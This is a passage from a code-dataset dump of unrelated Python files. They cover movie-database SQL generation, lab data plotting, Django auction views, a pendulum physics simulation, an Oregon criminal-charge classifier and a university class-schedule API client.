tqdm(finalSeries):\n\t\tserieInsert = serieTemplate.replace(\"#id#\", serie.id)\n\t\tserieInsert = serieInsert.replace(\"#description#\", serie.description)\n\t\tserieInsert = serieInsert.replace(\"#imagesrc#\", serie.serieIMG)\n\t\tserieInsert = serieInsert.replace(\"#imdb#\", str(int(float(serie.imdbRating))))\n\t\tserieInsert = serieInsert.replace(\"#title#\", serie.title)\n\t\tserieInsert = serieInsert.replace(\"#year#\", serie.year)\n\t\ts.write(serieInsert)\n\n\t\tfor genre in 
serie.genres:\n\t\t\tfor gen in genres:\n\t\t\t\tif gen == genre:\n\t\t\t\t\tindex = genres.index(genre)\n\t\t\t\t\tgenre_id = genre_ids[index]\n\t\t\t\t\tserieGenreInsert = serieGenreTemplate.replace(\"#serieID#\", serie.id)\n\t\t\t\t\tserieGenreInsert = serieGenreInsert.replace(\"#genreID#\", genre_id)\n\t\t\t\t\ts.write(serieGenreInsert)\n\n\n\t\tfor season in serie.seasons:\n\t\t\tseasonInsert = seasonTemplate.replace(\"#id#\", season.id)\n\t\t\tseasonInsert = seasonInsert.replace(\"#seasonnum#\", str(season.seasonNum))\n\t\t\tseasonInsert = seasonInsert.replace(\"#serieid#\", serie.id)\n\t\t\ts.write(seasonInsert)\n\n\t\t\tfor episode in season.episodes:\n\t\t\t\tvideoItemID = str(uuid.uuid4())\n\t\t\t\tvideoItemInsert = videoItemTemplate.replace(\"#id#\", videoItemID)\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#title#\", episode.title)\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#year#\", str(serie.year))\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#img#\", episode.imagesrc)\n\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#imdbrating#\", str(int(float(serie.imdbRating))))\n\t\t\t\tif episode.description == None:\n\t\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#description#\", \"No description\")\n\t\t\t\telse:\n\t\t\t\t\tepisode.description = episode.description.replace('\"', '')\n\t\t\t\t\tepisode.description = episode.description.replace(\"'\", \"\")\n\t\t\t\t\tvideoItemInsert = videoItemInsert.replace(\"#description#\", episode.description)\n\t\t\t\ts.write(videoItemInsert)\n\n\t\t\t\tepisodeInsert = episodeTemplate.replace(\"#id#\", episode.id)\n\t\t\t\tepisodeInsert = episodeInsert.replace(\"#season#\", season.id)\n\t\t\t\tepisodeInsert = episodeInsert.replace(\"#video_id#\", videoItemID)\n\t\t\t\ts.write(episodeInsert)\nprint(\"DONE!!!\")","sub_path":"src/main/resources/python/PrepareMovieData.py","file_name":"PrepareMovieData.py","file_ext":"py","file_size_in_byte":9097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"567124999","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nimport os\nimport re\nimport numpy as np\n\nfolder = []\nfor i in os.walk('C:/Users/makov/Desktop/Kinetics(May 2019)/Temp'):\n folder.append(i)\n\nprint('Folder', folder[0][1])\n\nmax_values_RT = []\nmax_values_320 = []\nmax_values_340 = []\nmax_values_RT_2 = []\nmax_values_320_2= []\nmax_values_340_2 = []\nCounter_RT = 0\nCounter_320 = 0\nCounter_340 = 0\nprevious = ''\n\nfor i in folder[0][1]:\n level_1 = os.listdir(''.join(folder[0][0] + '/' + i))\n # print(level_1[1].split('-'))\n level_1.sort(key=lambda x: int(re.search(r'\\d+', x.split('-')[0]).group()))\n print('Level 1', level_1)\n previous = level_1[0]\n for j in level_1:\n data = pd.read_csv(''.join(folder[0][0] + '/' + i + '/' + j))\n if 'RT' in j:\n # if j != level_1[0]:\n # if int(re.search(r'\\d+', previous.split('-')[0]).group()) == int(re.search(r'\\d+', j.split('-')[0]).group()):\n # max_values_RT_2.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # else:\n # max_values_RT.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # previous = j\n # else:\n max_values_RT.append(1 / data.iloc[data.idxmax()['filtered'] + 1, 2])\n\n if '320' in j:\n # if j != level_1[0]:\n # if int(re.search(r'\\d+', previous.split('-')[0]).group()) == int(re.search(r'\\d+', j.split('-')[0]).group()):\n # max_values_320_2.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # else:\n # max_values_320.append(data.iloc[data.idxmax()['filtered'] + 1, 
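# The movie/series generator above splices values into SQL text and escapes
# quotes by hand with .replace("'", "''"). A hedged alternative, sketched with
# sqlite3 purely as a stand-in for whatever database loads the generated .sql:
# parameter binding lets the driver handle quoting, so titles with apostrophes
# need no manual escaping.
import sqlite3
import uuid

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE video_item (id TEXT, title TEXT, year TEXT)")
rows = [(str(uuid.uuid4()), "O'Brien's Movie", "2015")]
conn.executemany("INSERT INTO video_item (id, title, year) VALUES (?, ?, ?)", rows)
conn.commit()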
2])\n # previous = j\n # else:\n max_values_320.append(1 / data.iloc[data.idxmax()['filtered'] + 1, 2])\n\n if '340' in j:\n # if j != level_1[0]:\n # if int(re.search(r'\\d+', previous.split('-')[0]).group()) == int(re.search(r'\\d+', j.split('-')[0]).group()):\n # max_values_340_2.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # else:\n # max_values_340.append(data.iloc[data.idxmax()['filtered'] + 1, 2])\n # previous = j\n # else:\n max_values_340.append(1 / data.iloc[data.idxmax()['filtered'] + 1, 2])\n\n max_value = data.max()['filtered']\n id_max_value = data.idxmax()['filtered']\n\nprint(data)\nprint(max_value, id_max_value)\nprint(max_values_RT)\nprint(max_values_320)\nprint(max_values_340)\n# print(max_values_RT_2)\n# print(max_values_320_2)\n# print(max_values_340_2)\n\n\n\nx = [i for i in range(5, 21)]\nprint(x)\n\np_RT = np.poly1d(np.polyfit(x, max_values_RT, 1))\np_320 = np.poly1d(np.polyfit(x, max_values_320, 1))\np_340 = np.poly1d(np.polyfit(x, max_values_340, 1))\n\nfig1, ax = plt.subplots()\nax.plot(x, max_values_RT, 'o', label='RT', color='green')\nax.plot(x, p_RT(x), '-', label='RT', color='green')\nax.plot(x, max_values_320, 'o', label='320 K', color='orange')\nax.plot(x, p_320(x), '-', label='320 K', color='orange')\nax.plot(x, max_values_340, 'o', label='340 K', color='red')\nax.plot(x, p_340(x), '-', label='340 K', color='red')\nax.set_xlabel('Energy, [eV]')\nax.set_ylabel('1/Time, [s]')\nax.legend()\n\n# fig2, ax1 = plt.subplots()\n# ax1.plot(x, max_values_RT, 'o-', color='green', label='1st')\n# ax1.plot(x[5:], max_values_RT_2, 'o-', color='lime', label='2nd')\n# ax1.set_xlabel('Energy, [eV]')\n# ax1.set_ylabel('Time, [s]')\n# ax1.set_title('Room temperature')\n# ax1.legend()\n#\n# fig3, ax2 = plt.subplots()\n# ax2.plot(x, max_values_320, 'o-', color='orange', label='1st')\n# ax2.plot(x[5:], max_values_320_2, 'o-', color='wheat', label='2nd')\n# ax2.set_xlabel('Energy, [eV]')\n# ax2.set_ylabel('Time, [s]')\n# ax2.set_title('320 K')\n# ax2.legend()\n#\n# fig4, ax3 = plt.subplots()\n# ax3.plot(x, max_values_340, 'o-', color='red', label='1st')\n# ax3.plot(x[5:], max_values_340_2, 'o-', color='mistyrose', label='2nd')\n# ax3.set_xlabel('Energy, [eV]')\n# ax3.set_ylabel('Time, [s]')\n# ax3.set_title('340 K')\n# ax3.legend()\n\nplt.show()","sub_path":"Original_Phase_Rate.py","file_name":"Original_Phase_Rate.py","file_ext":"py","file_size_in_byte":4077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"156218182","text":"import sys\nimport unittest\n\nsys.path.append('.') # for units tests\nfrom src.hello import hello\n\n\nclass TestHello(unittest.TestCase):\n def test_type(self):\n output = hello.hello()\n self.assertIsInstance(output, str, 'Wrong type!')\n\n def test_content(self):\n greetings = 'Hello'\n subject = 'World'\n output = hello.hello()\n self.assertIn(greetings, output, 'You should Say Hello!')\n self.assertIn(subject, output, 'Say Hello to the World!')\n\n def test_grammar(self):\n output = hello.hello()\n self.assertIn('!', output, \"Use '!' 
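# The temperature fits above rely on np.polyfit for a least-squares line and
# np.poly1d to turn the coefficients into a callable for plotting. The same
# two calls in isolation, on made-up rate data:
import numpy as np

x = np.array([5.0, 10.0, 15.0, 20.0])      # e.g. energy
y = np.array([0.11, 0.19, 0.32, 0.41])     # e.g. inverse rise time
slope, intercept = np.polyfit(x, y, 1)     # degree-1 fit, highest power first
p = np.poly1d([slope, intercept])
print(p(12.5))                             # evaluate the fitted line anywhere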
in Greetings!\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/unit/test_hello.py","file_name":"test_hello.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"360283040","text":"from django.shortcuts import render, get_object_or_404, reverse, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.utils.timezone import utc\nfrom .models import Auction, Bid\nfrom paintings.models import Painting\nfrom .forms import AuctionForm, BidForm\nimport datetime\nfrom django.core.exceptions import ValidationError\nfrom .scheduler import declare_winner\nfrom apscheduler.schedulers.background import BackgroundScheduler\nfrom django.http import JsonResponse\nfrom django.core import serializers\n\n# Create your views here.\n\n@login_required\ndef start_auction_view(request):\n\n if request.POST:\n\n auction_form = AuctionForm(request.POST, request=request)\n if auction_form.is_valid():\n auction = auction_form.save(commit=False)\n auction.seller = request.user\n auction.start_date = datetime.datetime.utcnow().replace(tzinfo=utc)\n end_date = auction.start_date + auction.duration\n scheduler = BackgroundScheduler()\n scheduler.add_job(declare_winner, 'date', run_date=end_date, args=[request,auction])\n scheduler.start()\n auction.save()\n messages.success(request,'An auction for your painting has been successfully created.')\n return redirect(reverse('index'))\n else:\n messages.error(request,\"We couldn't create an auction for this painting.\")\n else:\n auction_form = AuctionForm(request=request)\n\n return render (request, 'start_auction.html', {'auction_form' : auction_form})\n\ndef list_auctions_view(request, id=None):\n\n context = {}\n auctions_list = Auction.objects.all()\n context['auctions'] = auctions_list\n context['id'] = id\n \n return render(request, 'auctions_list.html', context)\n\ndef detail_auction_view(request, id=None):\n auction = get_object_or_404(Auction, id=id)\n bid_form = BidForm(auction=auction) \n return render(request, 'auction_detail.html', {'auction': auction, 'bid_form': bid_form, 'message': 'You have successfully placed a bid.'})\n\ndef place_bid(request, id=None):\n auction = get_object_or_404(Auction, id=id)\n if request.is_ajax and request.POST:\n bid_form = BidForm(request.POST, auction=auction)\n if bid_form.is_valid():\n bid = bid_form.save(commit=False)\n bid.bidder = request.user\n bid.auction = auction\n bid.save()\n current_price = bid.auction.current_price\n\n ser_bid = serializers.serialize('json', [bid, ])\n return JsonResponse({'bid': ser_bid, 'current_price':current_price}, status=200)\n else:\n return JsonResponse({\"error\": bid_form.errors}, status=400)\n return JsonResponse({\"error\": \"error\"}, status=400)","sub_path":"auction/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"435910037","text":"from django.urls import path\nfrom forum.views import HomeView\nfrom forum import views\n\nurlpatterns= [\n \n path('', HomeView.as_view(), name=\"forum\"),\n path('rev', views.rev, name=\"rev\"),\n path('rev/edit/', views.rev_update, name='rev_update'),\n path('about', views.about, name=\"about\"),\n path('filter/', views.fil, name='identity'),\n path('category/', 
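# start_auction_view above fires declare_winner exactly once at the auction's
# end_date by handing APScheduler a 'date' trigger. A minimal standalone
# sketch of that call (the apscheduler package must be installed;
# close_auction is an illustrative callback, not the project's declare_winner):
import datetime
from apscheduler.schedulers.background import BackgroundScheduler

def close_auction(auction_id):
    print("closing auction", auction_id)

scheduler = BackgroundScheduler()
run_at = datetime.datetime.now() + datetime.timedelta(seconds=5)
scheduler.add_job(close_auction, "date", run_date=run_at, args=[42])
scheduler.start()
# Note: the view starts a new scheduler per request; a single module-level
# scheduler per process is the more usual arrangement.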
views.cate,name=\"cate\"),\n]","sub_path":"forum/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"599691854","text":"from vpython import *\r\n\r\ng = 9.8\r\nsize, m = 0.05, 0.5\r\nL, k = 2, 15000\r\nangle = pi/6\r\nomega = 2*pi/86400\r\nlatitude = 23.5*pi/180\r\nc = 20 \r\n'''\r\nin order to accelerate the procedure of Foucault pendulum, i add a prameter 'c', which means \r\n'time magnification factor', it also means that I accelerate the speed of rotation 'c' times\r\nfaster.\r\n''' \r\n\r\nscene = canvas(width=500, height=500, center=vec(0, -1, 0), background=vec(0.5, 0.5, 0))\r\nceiling = box(length=0.8, height=0.005, width=0.8, color=color.blue)\r\nball = sphere(radius=size, color=color.red, make_trail=True, trail_type=\"points\",\r\n interval=20, trail_radius = 0.1*size)\r\nspring = cylinder(radius=0.01) # default pos = vec(0, 0, 0)\r\nball.v = vec(0.00001, 0, 0)\r\nball.pos = vec(-sin(angle)*L, -cos(angle)*L, 0)\r\nx_axis = vec(1,0,0)\r\n\r\nslab = label(pos=vec(0.4,-1.2,0), box = True)\r\nmlab = label(pos=vec(0.2,-1.2,0), box = True)\r\nhlab = label(pos=vec(0, -1.2,0), box = True)\r\ndlab = label(pos=vec(-0.2, -1.2,0), box = True)\r\ntlab = label(pos=vec(0.1, -1.6,0), box = False, text=str('time magnification factor c: '+str(c)))\r\nplab = label(pos=vec(0.1, -1.4,0), box = True)\r\nrlab = label(pos=vec(0, -2, 0), box = False)\r\n\r\ncount = 0\r\ndt = 0.001\r\nt = 0\r\nperiod = 0\r\nball_v_vec = vec(ball.v.x, 0, ball.v.z)\r\ncenter = vec(0, -cos(angle)*L, 0)\r\npre_x = mag(ball.pos-center)\r\nwhile True:\r\n rate(2000)\r\n t += dt\r\n period += dt\r\n \r\n #use two different variables to store distance from ball to center in three different time\r\n pre_pre_x = pre_x \r\n pre_x = mag(ball.pos - center)\r\n\r\n spring.axis = ball.pos - spring.pos # spring extended from endpoint to ball\r\n spring_force = - k * (mag(spring.axis) - L) * spring.axis.norm() # to get spring force vector\r\n Coriolis_ac = - 2 * cross(vec(0,sin(latitude),-cos(latitude)),ball.v)*omega*c # Coriolis force, c means 'time magnification factor'\r\n ball.a = vector(0, - g, 0) + spring_force / m + Coriolis_ac \r\n ball.v += ball.a*dt \r\n ball.pos += ball.v*dt\r\n ball_v_vec = vec(ball.v.x, 0, ball.v.z)\r\n\r\n cos_angle = abs(dot(x_axis,ball_v_vec))/(mag(x_axis)*mag(ball_v_vec))\r\n if mag(ball.v)>0.5:\r\n deltaangle = acos(cos_angle)*180/pi #claculate the deltaangle\r\n plab.text = str('deltaangle: %2.3f degree'%deltaangle)\r\n if pre_x > mag(ball.pos - center) and pre_x > pre_pre_x:\r\n count += 1\r\n if count == 2*1000/c:\r\n rlab.text = str('deltaangle = %2.4f degree after 1000 periods of pendulum'%deltaangle)\r\n\r\n sec = (t*c//1)%60\r\n mi = (t*c//60)%60\r\n hr = (t*c)//3600%24\r\n day = (t*c)//86400\r\n slab.text = str('%1.0fS'%sec)\r\n mlab.text = str('%1.0fM'%mi)\r\n hlab.text = str('%1.0fH'%hr)\r\n dlab.text = str('%1.0fD'%day)\r\n \r\n","sub_path":"physics_hw/b07901020(4)/optional.py","file_name":"optional.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"533167266","text":"from dataclasses import dataclass\n\nfrom expungeservice.models.charge_types.juvenile_charge import JuvenileCharge\nfrom expungeservice.models.charge_types.felony_class_a import FelonyClassA\nfrom expungeservice.models.charge_types.felony_class_b import FelonyClassB\nfrom 
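# The pendulum above adds a Coriolis acceleration a_c = -2 (Omega x v), with
# Earth's rotation vector resolved into the local frame at the chosen latitude
# and scaled by the speed-up factor c. The same single term in plain numpy:
import numpy as np

omega = 2 * np.pi / 86400                      # Earth's angular speed, rad/s
lat = np.radians(23.5)
Omega = omega * np.array([0.0, np.sin(lat), -np.cos(lat)])   # y up, matching the script's frame
v = np.array([0.3, 0.0, 0.1])                  # bob velocity, m/s (illustrative)
a_coriolis = -2.0 * np.cross(Omega, v)
print(a_coriolis)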
expungeservice.models.charge_types.felony_class_c import FelonyClassC\nfrom expungeservice.models.charge_types.traffic_violation import TrafficViolation\nfrom expungeservice.models.charge_types.traffic_non_violation import TrafficNonViolation\nfrom expungeservice.models.charge_types.duii import Duii\nfrom expungeservice.models.charge_types.subsection_6 import Subsection6\nfrom expungeservice.models.charge_types.marijuana_ineligible import MarijuanaIneligible\nfrom expungeservice.models.charge_types.misdemeanor import Misdemeanor\nfrom expungeservice.models.charge_types.violation import Violation\nfrom expungeservice.models.charge_types.parking_ticket import ParkingTicket\nfrom expungeservice.models.charge_types.person_felony import PersonFelonyClassB\nfrom expungeservice.models.charge_types.schedule_1_p_c_s import Schedule1PCS\nfrom expungeservice.models.charge_types.civil_offense import CivilOffense\nfrom expungeservice.models.charge_types.unclassified_charge import UnclassifiedCharge\nfrom expungeservice.models.charge_types.sex_crimes import SexCrime\n\n\n@dataclass\nclass ChargeClassifier:\n violation_type: str\n name: str\n statute: str\n level: str\n chapter: str\n section: str\n\n def classify(self):\n def classification_found(c):\n return c is not None\n\n for c in self.__classifications_list():\n if classification_found(c):\n return c\n\n def __classifications_list(self):\n yield ChargeClassifier._juvenile_charge(self.violation_type)\n yield ChargeClassifier._traffic_crime(self.statute, self.level)\n yield from ChargeClassifier._classification_by_statute(self.statute, self.chapter, self.section, self.level)\n yield ChargeClassifier._parking_ticket(self.violation_type)\n yield from ChargeClassifier._classification_by_level(self.level, self.statute)\n yield ChargeClassifier._civil_offense(self.statute, self.chapter, self.name)\n\n yield UnclassifiedCharge\n\n @staticmethod\n def _juvenile_charge(violation_type):\n if \"juvenile\" in violation_type.lower():\n return JuvenileCharge\n\n @staticmethod\n def _classification_by_statute(statute, chapter, section, level):\n yield ChargeClassifier._marijuana_ineligible(statute, section)\n yield ChargeClassifier._subsection_6(section, level)\n yield ChargeClassifier._schedule_1_pcs(section)\n yield ChargeClassifier._sex_crime(statute)\n\n @staticmethod\n def _classification_by_level(level, statute):\n yield ChargeClassifier._non_traffic_violation(level)\n yield ChargeClassifier._misdemeanor(level)\n yield ChargeClassifier._felony_class_c(level)\n yield ChargeClassifier._felony_class_b(level, statute)\n yield ChargeClassifier._felony_class_a(level)\n\n @staticmethod\n def _marijuana_ineligible(statute, section):\n ineligible_statutes = [\"475B359\", \"475B367\", \"475B371\", \"167262\"]\n if statute == \"475B3493C\" or section in ineligible_statutes:\n return MarijuanaIneligible\n\n @staticmethod\n def _subsection_6(section, level):\n conditionally_ineligible_statutes = [\n \"163200\", # (Criminal mistreatment in the second degree) if the victim at the time of the crime was 65 years of age or older.\n \"163205\", # (Criminal mistreatment in the first degree) if the victim at the time of the crime was 65 years of age or older, or when the offense constitutes child abuse as defined in ORS 419B.005 (Definitions).\n \"163575\", # (Endangering the welfare of a minor) (1)(a), when the offense constitutes child abuse as defined in ORS 419B.005 (Definitions).\n \"163145\", # (Criminally negligent homicide), when that offense was punishable as a Class C 
felony.\n \"163165\", # ( ineligible if under subection(1)(h) ; Assault in the third degree of a minor 10 years or younger)\n ]\n if section in conditionally_ineligible_statutes:\n return Subsection6\n\n @staticmethod\n def _traffic_crime(statute, level):\n\n chapter = statute[:3]\n if chapter.isdigit():\n statute_range = range(801, 826)\n\n chapter_num = int(chapter)\n\n if chapter_num == 813:\n return Duii\n\n elif chapter_num in statute_range:\n level_str = level.lower()\n if \"felony\" in level_str or \"misdemeanor\" in level_str:\n return TrafficNonViolation\n else:\n return TrafficViolation\n\n @staticmethod\n def _civil_offense(statute, chapter, name):\n statute_range = range(1, 100)\n if chapter:\n if chapter.isdigit() and int(chapter) in statute_range:\n return CivilOffense\n elif statute.isdigit() and int(statute) in statute_range:\n return CivilOffense\n elif \"fugitive complaint\" in name.lower():\n return CivilOffense\n\n @staticmethod\n def _schedule_1_pcs(section):\n if section in [\"475854\", \"475874\", \"475884\", \"475894\", \"475992\"]:\n return Schedule1PCS\n\n @staticmethod\n def _parking_ticket(violation_type):\n if \"parking\" in violation_type.lower():\n return ParkingTicket\n\n @staticmethod\n def _non_traffic_violation(level):\n if \"Violation\" in level:\n return Violation\n\n @staticmethod\n def _misdemeanor(level):\n if \"Misdemeanor\" in level:\n return Misdemeanor\n\n @staticmethod\n def _felony_class_c(level):\n if level == \"Felony Class C\":\n return FelonyClassC\n\n @staticmethod\n def _felony_class_b(level, statute):\n if level == \"Felony Class B\":\n if ChargeClassifier._person_felony(statute):\n return PersonFelonyClassB\n else:\n return FelonyClassB\n\n @staticmethod\n def _felony_class_a(level):\n if level == \"Felony Class A\":\n return FelonyClassA\n\n @staticmethod\n def _person_felony(statute):\n \"\"\"\n The statutes listed here are specified in https://secure.sos.state.or.us/oard/displayDivisionRules.action?selectedDivision=712\n The list includes statutes which are not named as class B felonies. However, because a statute can be charged as a different level of crime from that named in the statute, our expunger checks OECI directly for whether the charge was a class B felony, and then checks membership in this list.\n \"\"\"\n if statute in PersonFelonyClassB.statutes + PersonFelonyClassB.statutes_with_subsection:\n return True\n elif statute in [full_statute[:6] for full_statute in PersonFelonyClassB.statutes_with_subsection]:\n return True\n # In this case the type eligibility needs more analysis. 
The condition is checked again in the charge object's type eligibility method.\n else:\n return False\n\n @staticmethod\n def _sex_crime(statute):\n if statute in SexCrime.statutes + SexCrime.romeo_and_juliet_exceptions:\n return SexCrime\n","sub_path":"src/backend/expungeservice/models/helpers/charge_classifier.py","file_name":"charge_classifier.py","file_ext":"py","file_size_in_byte":7363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"429992842","text":"'''\nEste script grafica series temporales\n\nSource de https://scipy.github.io/old-wiki/pages/Cookbook/Matplotlib/LaTeX_Examples.html\n'''\n\nimport pylab\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\ngolden_mean = (math.sqrt(5)-1.0)/2.0 # Aesthetic ratio\nfig_width = 3+3/8 \t\t\t # width in inches\nfig_height = fig_width*golden_mean # height in inches\nfig_size = [fig_width,fig_height]\n\nparams = {'backend': 'ps',\n 'axes.titlesize': 8,\n 'axes.labelsize': 9,\n 'axes.linewidth': 0.5, \n 'axes.grid': True,\n 'axes.labelweight': 'normal', \n 'font.family': 'serif',\n 'font.size': 8.0,\n 'font.weight': 'normal',\n 'text.color': 'black',\n 'xtick.labelsize': 8,\n 'ytick.labelsize': 8,\n 'text.usetex': True,\n 'legend.fontsize': 8,\n 'figure.dpi': 300,\n 'figure.figsize': fig_size,\n 'savefig.dpi': 300,\n }\n\npylab.rcParams.update(params)\n\n### DATA ###\n\ndata = np.genfromtxt('26062019_tarde.txt', delimiter = '\\t')\ntime = np.linspace(0,len(data[:,0]),len(data[:,0])) \nsensor_1 = data[:,1] \nsensor_2 = data[:,2] \nsensor_3 = data[:,3] \nsensor_4 = data[:,4]\n\n### PLOT ###\n\n### Sensor 1 ###\nplt.plot(time,sensor_1,color='green',linewidth='0.5',label='sensor 1') \n\n### Sensor 2 ###\nplt.plot(time,sensor_2,color='orange',linewidth='0.5',label='sensor 2') \n\n### Sensor 3 ###\nplt.plot(time,sensor_3,color='blue',linewidth='0.5',label='sensor 3') \n\n### Sensor 4 ###\n#plt.plot(time,sensor_4,color='sienna',linewidth='0.5',label='sensor 4') \n\npylab.grid(False)\npylab.xlabel('time')\npylab.ylabel('tension~(mV)')\npylab.ylim(0, 1000)\nlgd=plt.legend(numpoints=1,handlelength=0.8) \nplt.legend(frameon=False,loc='best',labelspacing=-0.1,borderpad=0.3,handletextpad=0.5,fontsize=6,numpoints=1) \n\npylab.savefig('v_vs_t_sensor_2606_tarde_p.png', format='png', dpi=300, bbox_inches='tight')","sub_path":"analisis/260619/plot_v_vs_t.py","file_name":"plot_v_vs_t.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"300844512","text":"import requests\nimport pprint\nimport json\nimport re\nimport datetime\n\npp = pprint.PrettyPrinter(indent = 2)\n\ndef trim_spaces(l):\n '''Trim white spaces in a list of text elements'''\n return [' '.join(e.split()) for e in l]\n \ndef get_sections(dept, term_id, page_number, page_size, exclude):\n '''Get classes/sections from class API (one page at a time)'''\n base_url = 'https://apis.berkeley.edu/sis/v1/classes/sections'\n url = '{}?term-id={}&subject-area-code={}&print-in-schedule=true&page-number={}&page-size={}'.format(base_url, term_id, dept, page_number, page_size)\n #pp.pprint(url)\n # API ID and Key\n with open('config/api_keys.json', 'r') as f:\n api_keys = json.load(f)\n app_id = api_keys['class_app_id']\n app_key = api_keys['class_app_key']\n headers = {'accept': 'application/json', 'app_id': app_id, 'app_key': app_key}\n #pp.pprint(headers)\n response = requests.get(url, headers = headers)\n #pp.pprint(response.json())\n if 
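# ChargeClassifier.classify above walks a generator of candidate rules and
# keeps the first one that returns a class instead of None. The same
# first-match chain in miniature; the two rule functions are illustrative,
# not the project's real classifiers.
def rule_parking(description):
    return "ParkingTicket" if "parking" in description.lower() else None

def rule_default(description):
    return "Unclassified"

def classify(description, rules=(rule_parking, rule_default)):
    return next(c for rule in rules for c in [rule(description)] if c is not None)

print(classify("Parking violation"))   # ParkingTicket
print(classify("Felony Class B"))      # Unclassified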
response.status_code == requests.codes.ok and 'classSections' in response.json()['apiResponse']['response']:\n return response.json()['apiResponse']['response']['classSections']\n else:\n return []\n\ndef get_all_sections(dept, term_id, number_of_pages, page_size, exclude):\n '''Get all sections in output format compatible with Math website'''\n sections = []\n for i in range(number_of_pages):\n page_number = i + 1\n sections = sections + get_sections(dept, term_id, page_number, page_size, exclude)\n exclude_list = exclude.split(',')\n classes = []\n course_headers = ('Department', 'Number', 'Title')\n section_headers = ('Primary', 'Class', 'Number', 'Type', 'Days/Times', 'Location', 'Instructor', 'Status', 'Session', 'Sort Key')\n for s in sections:\n if not s['printInScheduleOfClasses']:\n # drop non-printable sections\n continue\n course_info = dict(zip(course_headers, get_course_info(s)))\n section_info = dict(zip(section_headers, get_section_info(s)))\n if section_info['Type'] in exclude_list:\n # drop sections from exclude list\n continue\n #print(s['class']['course']['displayName'], s['component']['code'], s['number'], s['id'])\n #print(course_info['Department'], course_info['Number'], section_info['Type'], section_info['Number'], section_info['Class'])\n classes += [{'Course': course_info, 'Section': section_info}]\n return classes\n\ndef get_course_info(section):\n '''Get course information from raw section format'''\n dept = section['class']['course']['subjectArea']['code']\n course_num = section['class']['course']['catalogNumber']['formatted']\n course_title = section['class']['course']['title']\n return (dept, course_num, course_title)\n\ndef get_section_info(section):\n '''Get section infomation from raw section format'''\n primary = section['association']['primary']\n class_num = section['id']\n section_num = section['number']\n section_type = section['component']['code']\n days = ''\n if 'meetings' in section.keys() and \\\n 'meetsDays' in section['meetings'][0].keys():\n days = section['meetings'][0]['meetsDays']\n times = ''\n if 'meetings' in section.keys() and \\\n 'startTime' in section['meetings'][0].keys() and \\\n 'endTime' in section['meetings'][0].keys():\n # convert 24 hour to 12 hour time\n t = datetime.datetime.strptime(section['meetings'][0]['startTime'], '%H:%M:%S')\n start_time = t.strftime('%I:%M%p')\n t = datetime.datetime.strptime(section['meetings'][0]['endTime'], '%H:%M:%S')\n end_time = t.strftime('%I:%M%p')\n times = '{:5s} - {:5s}'.format(start_time, end_time)\n days_times = ('{} {}'.format(days, times)).strip()\n #if days_times:\n #print(days_times)\n location = ''\n if 'meetings' in section.keys() and \\\n 'location' in section['meetings'][0].keys() and \\\n 'description' in section['meetings'][0]['location'].keys():\n location = section['meetings'][0]['location']['description']\n #print(location)\n instructor = ''\n if 'meetings' in section.keys() and \\\n 'assignedInstructors' in section['meetings'][0].keys():\n names = []\n for e in section['meetings'][0]['assignedInstructors']:\n if e['printInScheduleOfClasses'] and \\\n 'instructor' in e.keys() and \\\n 'names' in e['instructor'].keys() and \\\n 'formattedName' in e['instructor']['names'][0].keys():\n name = e['instructor']['names'][0]['formattedName']\n #print(name)\n names += [name]\n instructor = '\\n'.join(trim_spaces(names))\n if 'enrollmentStatus' in section and 'status' in section['enrollmentStatus'] and 'description' in section['enrollmentStatus']['status']:\n status = 
section['enrollmentStatus']['status']['description']\n else:\n status = 'Unknown'\n term = section['class']['session']['term']['name']\n session_name = section['class']['session']['name']\n start_date = section['startDate']\n start_date = datetime.datetime.strptime(start_date, '%Y-%m-%d').strftime('%B %d')\n end_date = section['endDate']\n end_date = datetime.datetime.strptime(end_date, '%Y-%m-%d').strftime('%B %d')\n if session_name == 'Regular Academic Session':\n session = '{}, {} - {}'.format(term, start_date, end_date)\n else:\n session = '{} {}, {} - {}'.format(term, session_name, start_date, end_date)\n course_num = section['class']['course']['catalogNumber']['formatted']\n sort_key = get_sortkey(course_num, section_num, section_type)\n return (primary, class_num, section_num, section_type, days_times, location, instructor, status, session, sort_key)\n\ndef get_sortkey(course_num, section_num, section_type):\n '''Produce sort key from course number, section number, and section type'''\n r = r'(^\\D?)(\\d+)(\\D*)$'\n m = re.match(r, course_num)\n m1 = m.group(1).rjust(1, ' ')\n m2 = m.group(2).rjust(3, '0')\n m3 = m.group(3).ljust(2, ' ')\n n = section_num\n if section_type == 'DIS' or section_type == 'WBD':\n n = n.rjust(5, '0')\n else:\n n = n.ljust(5, '0')\n return m2 + m3 + m1 + n\n\n\nif __name__ == '__main__':\n '''Get department class schedule for specified term'''\n from optparse import OptionParser\n\n usage = 'usage: %prog options'\n parser = OptionParser(usage)\n parser.add_option('-d', '--dept', dest = 'dept', default = 